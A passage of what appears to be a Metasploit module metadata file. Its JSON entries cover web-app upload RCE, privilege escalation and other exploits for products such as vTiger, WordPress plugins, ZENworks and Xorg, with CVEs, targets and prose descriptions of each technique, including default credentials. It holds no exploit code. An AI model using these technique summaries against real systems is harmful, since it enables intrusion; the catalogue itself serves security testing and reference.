"exploit_multi/http/visual_mining_netcharts_upload": {
"name": "Visual Mining NetCharts Server Remote Code Execution",
"full_name": "exploit/multi/http/visual_mining_netcharts_upload",
"rank": 600,
"disclosure_date": "2014-11-03",
"type": "exploit",
"author": [
"sghctoma",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits multiple vulnerabilities in Visual Mining NetCharts.\n First, a lack of input validation in the administration console permits\n arbitrary jsp code upload to locations accessible later through the web\n service. Authentication is typically required, however a 'hidden' user is\n available by default (and non-editable). This user, named 'Scheduler',\n can only log in to the console after any modification in the user\n database (a user is added, admin password is changed etc). If the\n 'Scheduler' user isn't available, valid credentials must be supplied. The\n default Admin password is Admin.",
"references": [
"CVE-2014-8516",
"ZDI-14-372"
],
"platform": "Linux,Windows",
"arch": "java",
"rport": 8001,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Visual Mining NetCharts Server 7.0"
],
"mod_time": "2018-08-20 15:43:07 +0000",
"path": "/modules/exploits/multi/http/visual_mining_netcharts_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/visual_mining_netcharts_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/vtiger_install_rce": {
"name": "Vtiger Install Unauthenticated Remote Command Execution",
"full_name": "exploit/multi/http/vtiger_install_rce",
"rank": 0,
"disclosure_date": "2014-03-05",
"type": "exploit",
"author": [
"Jonathan Borgeaud < research@navixia.com >"
],
"description": "This module exploits an arbitrary command execution vulnerability in the\n Vtiger install script. This module is set to ManualRanking due to this\n module overwriting the target database configuration, which may result in\n a broken web app, and you may not be able to get a session again.",
"references": [
"CVE-2014-2268",
"URL-https://www.navixia.com/blog/entry/navixia-find-critical-vulnerabilities-in-vtiger-crm-cve-2014-2268-cve-2014-2269.html",
"URL-http://vtiger-crm.2324883.n4.nabble.com/Vtigercrm-developers-IMP-forgot-password-and-re-installation-security-fix-tt9786.html"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Vtiger 6.0.0 or older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/vtiger_install_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_install_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/vtiger_logo_upload_exec": {
"name": "Vtiger CRM - Authenticated Logo Upload RCE",
"full_name": "exploit/multi/http/vtiger_logo_upload_exec",
"rank": 600,
"disclosure_date": "2015-09-28",
"type": "exploit",
"author": [
"Benjamin Daniel Mussler",
"Touhid M.Shaikh <touhidshaikh22@gmail.com>",
"SecureLayer7.net"
],
"description": "Vtiger 6.3.0 CRM's administration interface allows for the upload of a company logo.\n Instead of uploading an image, an attacker may choose to upload a file containing PHP code and\n run this code by accessing the resulting PHP file.\n\n This module was tested against vTiger CRM v6.3.0.",
"references": [
"CVE-2015-6000",
"CVE-2016-1713",
"EDB-38345"
],
"platform": "PHP",
"arch": "php",
"rport": 8888,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"vTiger CRM v6.3.0"
],
"mod_time": "2018-07-30 12:15:59 +0000",
"path": "/modules/exploits/multi/http/vtiger_logo_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_logo_upload_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/vtiger_php_exec": {
"name": "vTigerCRM v5.4.0/v5.3.0 Authenticated Remote Code Execution",
"full_name": "exploit/multi/http/vtiger_php_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "vTiger CRM allows an authenticated user to upload files to embed within documents.\n Due to insufficient privileges on the 'files' upload folder, an attacker can upload a PHP\n script and execute arbitrary PHP code remotely.\n\n This module was tested against vTiger CRM v5.4.0 and v5.3.0.",
"references": [
"CVE-2013-3591",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-08 10:04:47 +0000",
"path": "/modules/exploits/multi/http/vtiger_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_php_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/vtiger_soap_upload": {
"name": "vTiger CRM SOAP AddEmailAttachment Arbitrary File Upload",
"full_name": "exploit/multi/http/vtiger_soap_upload",
"rank": 600,
"disclosure_date": "2013-03-26",
"type": "exploit",
"author": [
"Egidio Romano",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "vTiger CRM allows a user to bypass authentication when requesting SOAP services.\n In addition, arbitrary file upload is possible through the AddEmailAttachment SOAP\n service. By combining both vulnerabilities an attacker can upload and execute PHP\n code. This module has been tested successfully on vTiger CRM v5.4.0 over Ubuntu\n 10.04 and Windows 2003 SP2.",
"references": [
"CVE-2013-3214",
"CVE-2013-3215",
"OSVDB-95902",
"OSVDB-95903",
"BID-61558",
"BID-61559",
"EDB-27279",
"URL-http://karmainsecurity.com/KIS-2013-07",
"URL-http://karmainsecurity.com/KIS-2013-08"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"vTigerCRM v5.4.0"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/vtiger_soap_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/vtiger_soap_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/webnms_file_upload": {
"name": "WebNMS Framework Server Arbitrary File Upload",
"full_name": "exploit/multi/http/webnms_file_upload",
"rank": 600,
"disclosure_date": "2016-07-04",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module abuses a vulnerability in WebNMS Framework Server 5.2 that allows an\nunauthenticated user to upload text files by using a directory traversal attack\non the FileUploadServlet servlet. A JSP file can be uploaded that then drops and\nexecutes a malicious payload, achieving code execution under the user which the\nWebNMS server is running.\nThis module has been tested with WebNMS Framework Server 5.2 and 5.2 SP1 on\nWindows and Linux.",
"references": [
"CVE-2016-6600",
"URL-https://blogs.securiteam.com/index.php/archives/2712",
"URL-https://seclists.org/fulldisclosure/2016/Aug/54"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 9090,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic",
"WebNMS Framework Server 5.2 / 5.2 SP1 - Linux",
"WebNMS Framework Server 5.2 / 5.2 SP1 - Windows"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/webnms_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/webnms_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/webpagetest_upload_exec": {
"name": "WebPageTest Arbitrary PHP File Upload",
"full_name": "exploit/multi/http/webpagetest_upload_exec",
"rank": 600,
"disclosure_date": "2012-07-13",
"type": "exploit",
"author": [
"dun",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in WebPageTest's Upload Feature. By\n default, the resultimage.php file does not verify the user-supplied item before\n saving it to disk, and then places this item in the web directory accessible by\n remote users. This flaw can be abused to gain remote code execution.",
"references": [
"OSVDB-83822",
"EDB-19790"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WebPageTest v2.6 or older"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/webpagetest_upload_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/webpagetest_upload_exec",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/werkzeug_debug_rce": {
"name": "Werkzeug Debug Shell Command Execution",
"full_name": "exploit/multi/http/werkzeug_debug_rce",
"rank": 600,
"disclosure_date": "2015-06-28",
"type": "exploit",
"author": [
"h00die <mike@shorebreaksecurity.com>"
],
"description": "This module will exploit the Werkzeug debug console to put down a\n Python shell. This debugger \"must never be used on production\n machines\" but sometimes slips past testing.\n\n Tested against:\n 0.9.6 on Debian\n 0.9.6 on Centos\n 0.10 on Debian",
"references": [
"URL-http://werkzeug.pocoo.org/docs/0.10/debug/#enabling-the-debugger"
],
"platform": "Python",
"arch": "python",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"werkzeug 0.10 and older"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/werkzeug_debug_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/werkzeug_debug_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wikka_spam_exec": {
"name": "WikkaWiki 1.3.2 Spam Logging PHP Injection",
"full_name": "exploit/multi/http/wikka_spam_exec",
"rank": 600,
"disclosure_date": "2011-11-30",
"type": "exploit",
"author": [
"EgiX",
"sinn3r <sinn3r@metasploit.com>"
],
"description": "This module exploits a vulnerability found in WikkaWiki. When the spam logging\n feature is enabled, it is possible to inject PHP code into the spam log file via the\n UserAgent header, and then request it to execute our payload. There are at least\n three different ways to trigger spam protection, this module does so by generating\n 10 fake URLs in a comment (by default, the max_new_comment_urls parameter is 6).\n\n Please note that in order to use the injection, you must manually pick a page\n first that allows you to add a comment, and then set it as 'PAGE'.",
"references": [
"CVE-2011-4451",
"OSVDB-77393",
"EDB-18177"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WikkaWiki 1.3.2 r1814"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/wikka_spam_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/wikka_spam_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wp_crop_rce": {
"name": "WordPress Crop-image Shell Upload",
"full_name": "exploit/multi/http/wp_crop_rce",
"rank": 600,
"disclosure_date": "2019-02-19",
"type": "exploit",
"author": [
"RIPSTECH Technology",
"Wilfried Becard <wilfried.becard@synacktiv.com>"
],
"description": "This module exploits a path traversal and a local file inclusion\n vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n The crop-image function allows a user, with at least author privileges,\n to resize an image and perform a path traversal by changing the _wp_attached_file\n reference during the upload. The second part of the exploit will include\n this image in the current theme by changing the _wp_page_template attribute\n when creating a post.\n\n This exploit module only works for Unix-based systems currently.",
"references": [
"CVE-2019-8942",
"CVE-2019-8943",
"URL-https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"WordPress"
],
"mod_time": "2019-04-04 15:19:58 +0000",
"path": "/modules/exploits/multi/http/wp_crop_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_crop_rce",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wp_ninja_forms_unauthenticated_file_upload": {
"name": "WordPress Ninja Forms Unauthenticated File Upload",
"full_name": "exploit/multi/http/wp_ninja_forms_unauthenticated_file_upload",
"rank": 600,
"disclosure_date": "2016-05-04",
"type": "exploit",
"author": [
"James Golovich",
"rastating"
],
"description": "Versions 2.9.36 to 2.9.42 of the Ninja Forms plugin contain\n an unauthenticated file upload vulnerability, allowing guests\n to upload arbitrary PHP code that can be executed in the context\n of the web server.",
"references": [
"CVE-2016-1209",
"WPVDB-8485",
"URL-http://www.pritect.net/blog/ninja-forms-2-9-42-critical-security-vulnerabilities"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ninja-forms"
],
"mod_time": "2018-10-01 18:59:09 +0000",
"path": "/modules/exploits/multi/http/wp_ninja_forms_unauthenticated_file_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_ninja_forms_unauthenticated_file_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/wp_responsive_thumbnail_slider_upload": {
"name": "WordPress Responsive Thumbnail Slider Arbitrary File Upload",
"full_name": "exploit/multi/http/wp_responsive_thumbnail_slider_upload",
"rank": 600,
"disclosure_date": "2015-08-28",
"type": "exploit",
"author": [
"Arash Khazaei",
"Shelby Pace"
],
"description": "This module exploits an arbitrary file upload vulnerability in Responsive Thumbnail Slider\n Plugin v1.0 for WordPress post authentication.",
"references": [
"EDB-37998"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Responsive Thumbnail Slider Plugin v1.0"
],
"mod_time": "2018-07-26 23:08:20 +0000",
"path": "/modules/exploits/multi/http/wp_responsive_thumbnail_slider_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/wp_responsive_thumbnail_slider_upload",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/x7chat2_php_exec": {
"name": "X7 Chat 2.0.5 lib/message.php preg_replace() PHP Code Execution",
"full_name": "exploit/multi/http/x7chat2_php_exec",
"rank": 600,
"disclosure_date": "2014-10-27",
"type": "exploit",
"author": [
"Fernando Munoz <fernando@null-life.com>",
"Juan Escobar <eng.jescobar@gmail.com>"
],
"description": "This module exploits a post-auth vulnerability found in X7 Chat versions\n 2.0.0 up to 2.0.5.1. The vulnerable code exists on lib/message.php, which\n uses preg_replace() function with the /e modifier. This allows a remote\n authenticated attacker to execute arbitrary PHP code in the remote machine.",
"references": [
"BID-71014",
"CVE-2014-8998",
"URL-https://github.com/rapid7/metasploit-framework/pull/4076"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)"
],
"mod_time": "2018-07-12 17:34:52 +0000",
"path": "/modules/exploits/multi/http/x7chat2_php_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/x7chat2_php_exec",
"check": true,
"post_auth": true,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zabbix_script_exec": {
"name": "Zabbix Authenticated Remote Command Execution",
"full_name": "exploit/multi/http/zabbix_script_exec",
"rank": 600,
"disclosure_date": "2013-10-30",
"type": "exploit",
"author": [
"Brandon Perry <bperry.volatile@gmail.com>"
],
"description": "ZABBIX allows an administrator to create scripts that will be run on hosts.\n An authenticated attacker can create a script containing a payload, then a host\n with an IP of 127.0.0.1 and run the arbitrary script on the ZABBIX host.\n\n This module was tested against Zabbix v2.0.9.",
"references": [
"CVE-2013-3628",
"URL-https://community.rapid7.com/community/metasploit/blog/2013/10/30/seven-tricks-and-treats"
],
"platform": "Linux,Unix",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Automatic"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/zabbix_script_exec.rb",
"is_install_path": true,
"ref_name": "multi/http/zabbix_script_exec",
"check": true,
"post_auth": true,
"default_credential": true,
"notes": {
}
},
"exploit_multi/http/zemra_panel_rce": {
"name": "Zemra Botnet CnC Web Panel Remote Code Execution",
"full_name": "exploit/multi/http/zemra_panel_rce",
"rank": 600,
"disclosure_date": "2012-06-28",
"type": "exploit",
"author": [
"Jay Turla <@shipcod3>",
"Angel Injection",
"Darren Martyn <@info_dox>"
],
"description": "This module exploits the CnC web panel of Zemra Botnet which contains a backdoor\n inside its leaked source code. Zemra is a crimeware bot that can be used to\n conduct DDoS attacks and is detected by Symantec as Backdoor.Zemra.",
"references": [
"URL-http://0day.today/exploit/19259",
"URL-http://insecurety.net/?p=144",
"URL-http://www.symantec.com/connect/blogs/ddos-attacks-zemra-bot"
],
"platform": "Unix,Windows",
"arch": "cmd",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"zemra panel / Unix",
"zemra panel / Windows"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/http/zemra_panel_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/zemra_panel_rce",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zenworks_configuration_management_upload": {
"name": "Novell ZENworks Configuration Management Arbitrary File Upload",
"full_name": "exploit/multi/http/zenworks_configuration_management_upload",
"rank": 600,
"disclosure_date": "2015-04-07",
"type": "exploit",
"author": [
"Pedro Ribeiro <pedrib@gmail.com>"
],
"description": "This module exploits a file upload vulnerability in Novell ZENworks Configuration\n Management (ZCM, which is part of the ZENworks Suite). The vulnerability exists in\n the UploadServlet which accepts unauthenticated file uploads and does not check the\n \"uid\" parameter for directory traversal characters. This allows an attacker to write\n anywhere in the file system, and can be abused to deploy a WAR file in the Tomcat\n webapps directory. ZCM up to (and including) 11.3.1 is vulnerable to this attack.\n This module has been tested successfully with ZCM 11.3.1 on Windows and Linux. Note\n that this is a similar vulnerability to ZDI-10-078 / OSVDB-63412 which also has a\n Metasploit exploit, but it abuses a different parameter of the same servlet.",
"references": [
"CVE-2015-0779",
"OSVDB-120382",
"URL-https://seclists.org/fulldisclosure/2015/Apr/21"
],
"platform": "Java",
"arch": "java",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Novell ZCM < v11.3.2 - Universal Java"
],
"mod_time": "2018-09-15 18:54:45 +0000",
"path": "/modules/exploits/multi/http/zenworks_configuration_management_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/zenworks_configuration_management_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zenworks_control_center_upload": {
"name": "Novell ZENworks Configuration Management Remote Execution",
"full_name": "exploit/multi/http/zenworks_control_center_upload",
"rank": 500,
"disclosure_date": "2013-03-22",
"type": "exploit",
"author": [
"James Burton",
"juan vazquez <juan.vazquez@metasploit.com>"
],
"description": "This module exploits a code execution flaw in Novell ZENworks Configuration\n Management 10 SP3 and 11 SP2. The vulnerability exists in the ZENworks Control\n Center application, allowing an unauthenticated attacker to upload a malicious file\n outside of the TEMP directory and then make a second request that allows for\n arbitrary code execution. This module has been tested successfully on Novell\n ZENworks Configuration Management 10 SP3 and 11 SP2 on Windows 2003 SP2 and SUSE\n Linux Enterprise Server 10 SP3.",
"references": [
"CVE-2013-1080",
"BID-58668",
"OSVDB-91627",
"ZDI-13-049",
"URL-http://www.novell.com/support/kb/doc.php?id=7011812"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 443,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"ZENworks Configuration Management 10 SP3 and 11 SP2 / Windows 2003 SP2",
"ZENworks Configuration Management 10 SP3 and 11 SP2 / SUSE Linux Enterprise Server 10 SP3"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/zenworks_control_center_upload.rb",
"is_install_path": true,
"ref_name": "multi/http/zenworks_control_center_upload",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/http/zpanel_information_disclosure_rce": {
"name": "Zpanel Remote Unauthenticated RCE",
"full_name": "exploit/multi/http/zpanel_information_disclosure_rce",
"rank": 600,
"disclosure_date": "2014-01-30",
"type": "exploit",
"author": [
"Balazs Makany",
"Jose Antonio Perez",
"dawn isabel",
"brad wolfe",
"brent morris",
"james fitts"
],
"description": "This module exploits an information disclosure vulnerability\n in ZPanel. The vulnerability is due to a vulnerable version\n of pChart used by ZPanel that allows unauthenticated users to read\n arbitrary files remotely on the file system. This particular module\n utilizes this vulnerability to identify the username/password\n combination of the MySQL instance. With the\n credentials the attackers can log in to PHPMyAdmin and execute\n SQL commands to drop a malicious payload on the filesystem and\n call it, leading to remote code execution.",
"references": [
"EDB-31173",
"OSVDB-102595",
"URL-http://blog.0xlabs.com/2014/03/zpanel-10.1.x-remote-root.html",
"URL-http://pastebin.com/y5Pf4Yms"
],
"platform": "PHP",
"arch": "php",
"rport": 80,
"autofilter_ports": [
80,
8080,
443,
8000,
8888,
8880,
8008,
3000,
8443
],
"autofilter_services": [
"http",
"https"
],
"targets": [
"Generic (PHP Payload)",
"Linux x86"
],
"mod_time": "2017-09-07 21:18:50 +0000",
"path": "/modules/exploits/multi/http/zpanel_information_disclosure_rce.rb",
"is_install_path": true,
"ref_name": "multi/http/zpanel_information_disclosure_rce",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/ids/snort_dce_rpc": {
"name": "Snort 2 DCE/RPC Preprocessor Buffer Overflow",
"full_name": "exploit/multi/ids/snort_dce_rpc",
"rank": 400,
"disclosure_date": "2007-02-19",
"type": "exploit",
"author": [
"Neel Mehta",
"Trirat Puttaraksa",
"Carsten Maartmann-Moe <carsten@carmaa.com>",
"0a29406d9794e4f9b30b3c5d6702c708"
],
"description": "This module allows remote attackers to execute arbitrary code by exploiting the\n Snort service via crafted SMB traffic. The vulnerability is due to a boundary\n error within the DCE/RPC preprocessor when reassembling SMB Write AndX requests,\n which may result in a stack-based buffer overflow with a specially crafted packet\n sent on a network that is monitored by Snort.\n\n Vulnerable versions include Snort 2.6.1, 2.7 Beta 1 and SourceFire IDS 4.1, 4.5 and 4.6.\n\n Any host on the Snort network may be used as the remote host. The remote host does not\n need to be running the SMB service for the exploit to be successful.",
"references": [
"OSVDB-32094",
"CVE-2006-5276",
"URL-http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html",
"URL-http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html",
"URL-http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py"
],
"platform": "Linux,Windows",
"arch": "",
"rport": 139,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows Universal",
"Redhat 8"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/ids/snort_dce_rpc.rb",
"is_install_path": true,
"ref_name": "multi/ids/snort_dce_rpc",
"check": false,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/local/allwinner_backdoor": {
"name": "Allwinner 3.4 Legacy Kernel Local Privilege Escalation",
"full_name": "exploit/multi/local/allwinner_backdoor",
"rank": 600,
"disclosure_date": "2016-04-30",
"type": "exploit",
"author": [
"h00die <mike@stcyrsecurity.com>",
"KotCzarny"
],
"description": "This module attempts to exploit a debug backdoor privilege escalation in\n Allwinner SoC based devices.\n Vulnerable Allwinner SoC chips: H3, A83T or H8 which rely on Kernel 3.4\n Vulnerable OS: all OS images available for Orange Pis,\n any for FriendlyARM's NanoPi M1,\n SinoVoip's M2+ and M3,\n Cuebietech's Cubietruck +\n Linksprite's pcDuino8 Uno\n Exploitation may be possible against Dragon (x10) and Allwinner Android tablets",
"references": [
"CVE-2016-10225",
"URL-http://forum.armbian.com/index.php/topic/1108-security-alert-for-allwinner-sun8i-h3a83th8/",
"URL-https://webcache.googleusercontent.com/search?q=cache:l2QYVUcDflkJ:https://github.com/allwinner-zh/linux-3.4-sunxi/blob/master/arch/arm/mach-sunxi/sunxi-debug.c+&cd=3&hl=en&ct=clnk&gl=us",
"URL-http://irclog.whitequark.org/linux-sunxi/2016-04-29#16314390"
],
"platform": "Android,Linux",
"arch": "armle",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Auto"
],
"mod_time": "2017-07-24 06:26:21 +0000",
"path": "/modules/exploits/multi/local/allwinner_backdoor.rb",
"is_install_path": true,
"ref_name": "multi/local/allwinner_backdoor",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc": {
"name": "MagniComp SysInfo mcsiwrapper Privilege Escalation",
"full_name": "exploit/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
"rank": 600,
"disclosure_date": "2016-09-23",
"type": "exploit",
"author": [
"Daniel Lawson",
"Romain Trouve",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges on systems running\n MagniComp SysInfo versions prior to 10-H64.\n\n The .mcsiwrapper suid executable allows loading a config file using the\n '--configfile' argument. The 'ExecPath' config directive is used to set\n the executable load path. This module abuses this functionality to set\n the load path resulting in execution of arbitrary code as root.\n\n This module has been tested successfully with SysInfo version\n 10-H63 on Fedora 20 x86_64, 10-H32 on Fedora 27 x86_64, 10-H10 on\n Debian 8 x86_64, and 10-GA on Solaris 10u11 x86.",
"references": [
"CVE-2017-6516",
"BID-96934",
"URL-http://www.magnicomp.com/support/cve/CVE-2017-6516.shtml",
"URL-https://labs.mwrinfosecurity.com/advisories/magnicomps-sysinfo-root-setuid-local-privilege-escalation-vulnerability/",
"URL-https://labs.mwrinfosecurity.com/advisories/multiple-vulnerabilities-in-magnicomps-sysinfo-root-setuid/"
],
"platform": "Linux,Solaris",
"arch": "x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Automatic",
"Solaris",
"Linux"
],
"mod_time": "2019-01-10 19:19:14 +0000",
"path": "/modules/exploits/multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc.rb",
"is_install_path": true,
"ref_name": "multi/local/magnicomp_sysinfo_mcsiwrapper_priv_esc",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/local/xorg_x11_suid_server": {
"name": "Xorg X11 Server SUID logfile Privilege Escalation",
"full_name": "exploit/multi/local/xorg_x11_suid_server",
"rank": 400,
"disclosure_date": "2018-10-25",
"type": "exploit",
"author": [
"Narendra Shinde",
"Raptor - 0xdea",
"Aaron Ringo",
"bcoles <bcoles@gmail.com>"
],
"description": "This module attempts to gain root privileges with SUID Xorg X11 server\n versions 1.19.0 < 1.20.3.\n\n A permission check flaw exists for -modulepath and -logfile options when\n starting Xorg. This allows unprivileged users that can start the server\n the ability to elevate privileges and run arbitrary code under root\n privileges.\n\n This module has been tested with OpenBSD 6.3, 6.4, CentOS 7.4.1708, and\n CentOS 7.5.1804, and RHEL 7.5. The default PAM configuration for CentOS\n and RHEL systems requires console auth for the user's session to start\n the Xorg server.\n\n Cron launches the payload, so if SELinux is enforcing, exploitation\n may still be possible, but the module will bail.\n\n Xorg must have SUID permissions and may not start if already running.\n\n On exploitation a crontab.old backup file will be created by Xorg.\n This module will remove the .old file and restore crontab after\n successful exploitation. Failed exploitation may result in a corrupted\n crontab. On successful exploitation artifacts will be created consistent\n with starting Xorg and running a cron.",
"references": [
"CVE-2018-14665",
"BID-105741",
"EDB-45697",
"EDB-45742",
"EDB-45832",
"URL-https://www.securepatterns.com/2018/10/cve-2018-14665-xorg-x-server.html",
"URL-https://github.com/0xdea/exploits/blob/master/openbsd/raptor_xorgasm"
],
"platform": "Linux,OpenBSD",
"arch": "cmd, x86, x64",
"rport": null,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"OpenBSD",
"Linux x64",
"Linux x86"
],
"mod_time": "2019-04-21 11:21:28 +0000",
"path": "/modules/exploits/multi/local/xorg_x11_suid_server.rb",
"is_install_path": true,
"ref_name": "multi/local/xorg_x11_suid_server",
"check": true,
"post_auth": false,
"default_credential": false,
"notes": {
}
},
"exploit_multi/misc/arkeia_agent_exec": {
"name": "Western Digital Arkeia Remote Code Execution",
"full_name": "exploit/multi/misc/arkeia_agent_exec",
"rank": 500,
"disclosure_date": "2015-07-10",
"type": "exploit",
"author": [
"xistence <xistence@0x90.nl>"
],
"description": "This module exploits a code execution flaw in Western Digital Arkeia version 11.0.12 and below.\n The vulnerability exists in the 'arkeiad' daemon listening on TCP port 617. Because there are\n insufficient checks on the authentication of all clients, this can be bypassed.\n Using the ARKFS_EXEC_CMD operation it's possible to execute arbitrary commands with root or\n SYSTEM privileges.\n The daemon is installed on both the Arkeia server as well on all the backup clients. The module\n has been successfully tested on Windows, Linux, OSX, FreeBSD and OpenBSD.",
"references": [
"CVE-2015-7709",
"EDB-37600",
"URL-https://seclists.org/fulldisclosure/2015/Jul/54"
],
"platform": "",
"arch": "",
"rport": 617,
"autofilter_ports": [
],
"autofilter_services": [
],
"targets": [
"Windows",
"Linux"
],
